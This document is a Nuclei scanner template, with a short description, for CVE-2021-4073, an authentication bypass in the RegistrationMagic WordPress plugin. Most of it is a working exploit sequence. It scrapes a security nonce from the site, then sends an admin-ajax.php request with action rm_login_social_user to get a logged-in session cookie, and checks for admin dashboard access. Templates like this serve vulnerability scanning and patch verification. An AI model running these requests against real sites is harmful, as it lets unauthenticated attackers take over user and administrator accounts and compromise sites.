RegistrationMagic WordPress plugin versions <= 5.0.1.7 contain an authentication bypass caused by missing identity validation in social_login_using_email(), letting unauthenticated users log in as any site user, exploit requires knowing a valid username.
PoC代码[已公开]
id: CVE-2021-4073
info:
name: RegistrationMagic <= 5.0.1.7 - Authentication Bypass
author: daffainfo
severity: critical
description: |
RegistrationMagic WordPress plugin versions <= 5.0.1.7 contain an authentication bypass caused by missing identity validation in social_login_using_email(), letting unauthenticated users log in as any site user, exploit requires knowing a valid username.
impact: |
Unauthenticated attackers can log in as any user, including administrators, potentially leading to full site compromise.
remediation: |
Update to the latest version of the plugin where the issue is fixed.
reference:
- https://www.wordfence.com/blog/2021/12/authentication-bypass-vulnerability-patched-in-user-registration-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2021-4073
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-4073
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-4073
cwe-id: CWE-287
epss-score: 0.71883
epss-percentile: 0.98672
cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: metagauss
product: registrationmagic
framework: wordpress
tags: cve,cve2021,wordpress,wp,wp-plugin,metagauss,registrationmagic,auth-bypass,vkev
flow: |
if (template.path != null) {
http(1)
}
http(2)
http(3)
http(4)
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- method: GET
path:
- "{{BaseURL}}{{path}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "handle_data(", "FB.login(")'
condition: and
internal: true
extractors:
- type: regex
name: nonce
group: 1
regex:
- "handle_data.*'([0-9a-f]+)'\\);"
internal: true
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "\"request_processing\":", "\"security\":", "\"hours\":")'
condition: and
internal: true
extractors:
- type: regex
name: nonce
group: 1
regex:
- '"security":"([0-9a-f]+)","hours"'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=rm_login_social_user&email={{email}}&security={{nonce}}
matchers:
- type: dsl
dsl:
- 'contains(header, "wordpress_logged_in_")'
- 'contains_all(body, "\"code\":", "\"msg\":")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /wp-admin/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains_all(body, '>Profile</div>', 'wp-admin-bar-root-default')"
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100ff90f35a951492dac515388640471e8f9c68ab16858db2b3f5174de4ae10e0140220461ab8d4a7a6cc7354df66b74d3740c73f563ffaea177a56316782083ed48453:922c64590222798bb761d5b6d8e72950